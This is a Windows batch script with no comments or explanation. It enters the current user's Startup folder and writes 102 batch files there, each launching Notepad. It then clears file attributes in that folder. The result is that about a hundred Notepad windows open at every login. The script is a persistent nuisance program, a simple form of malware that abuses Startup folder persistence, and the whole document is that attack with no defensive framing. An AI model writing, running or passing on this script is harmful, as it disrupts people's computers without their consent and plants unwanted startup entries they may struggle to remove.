@echo off
cd\
C:
cd %homepath%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
echo start notepad	>	1.bat
echo start notepad	>	2.bat
echo start notepad	>	3.bat
echo start notepad	>	4.bat
echo start notepad	>	5.bat
echo start notepad	>	6.bat
echo start notepad	>	7.bat
echo start notepad	>	8.bat
echo start notepad	>	9.bat
echo start notepad	>	10.bat
echo start notepad	>	11.bat
echo start notepad	>	12.bat
echo start notepad	>	13.bat
echo start notepad	>	14.bat
echo start notepad	>	15.bat
echo start notepad	>	16.bat
echo start notepad	>	17.bat
echo start notepad	>	18.bat
echo start notepad	>	19.bat
echo start notepad	>	20.bat
echo start notepad	>	21.bat
echo start notepad	>	22.bat
echo start notepad	>	23.bat
echo start notepad	>	24.bat
echo start notepad	>	25.bat
echo start notepad	>	26.bat
echo start notepad	>	27.bat
echo start notepad	>	28.bat
echo start notepad	>	29.bat
echo start notepad	>	30.bat
echo start notepad	>	31.bat
echo start notepad	>	32.bat
echo start notepad	>	33.bat
echo start notepad	>	34.bat
echo start notepad	>	35.bat
echo start notepad	>	36.bat
echo start notepad	>	37.bat
echo start notepad	>	38.bat
echo start notepad	>	39.bat
echo start notepad	>	40.bat
echo start notepad	>	41.bat
echo start notepad      >       42.bat
echo start notepad	>	43.bat
echo start notepad	>	44.bat
echo start notepad	>	45.bat
echo start notepad	>	46.bat
echo start notepad	>	47.bat
echo start notepad	>	48.bat
echo start notepad	>	49.bat
echo start notepad	>	50.bat
echo start notepad	>	51.bat
echo start notepad	>	52.bat
echo start notepad	>	53.bat
echo start notepad	>	54.bat
echo start notepad	>	55.bat
echo start notepad	>	56.bat
echo start notepad	>	57.bat
echo start notepad	>	58.bat
echo start notepad	>	59.bat
echo start notepad	>	60.bat
echo start notepad	>	61.bat
echo start notepad	>	62.bat
echo start notepad	>	63.bat
echo start notepad	>	64.bat
echo start notepad	>	65.bat
echo start notepad	>	66.bat
echo start notepad	>	67.bat
echo start notepad	>	68.bat
echo start notepad	>	69.bat
echo start notepad	>	70.bat
echo start notepad	>	71.bat
echo start notepad	>	72.bat
echo start notepad	>	73.bat
echo start notepad	>	74.bat
echo start notepad	>	75.bat
echo start notepad	>	76.bat
echo start notepad	>	77.bat
echo start notepad	>	78.bat
echo start notepad	>	79.bat
echo start notepad	>	80.bat
echo start notepad	>	81.bat
echo start notepad	>	82.bat
echo start notepad	>	83.bat
echo start notepad	>	84.bat
echo start notepad	>	85.bat
echo start notepad	>	86.bat
echo start notepad	>	87.bat
echo start notepad	>	88.bat
echo start notepad	>	89.bat
echo start notepad	>	90.bat
echo start notepad	>	91.bat
echo start notepad	>	92.bat
echo start notepad	>	93.bat
echo start notepad	>	94.bat
echo start notepad	>	95.bat
echo start notepad	>	96.bat
echo start notepad	>	97.bat
echo start notepad	>	98.bat
echo start notepad	>	99.bat
echo start notepad	>	100.bat
echo start notepad	>	101.bat
echo start notepad	>	102.bat
attrib -s -h -r *.*

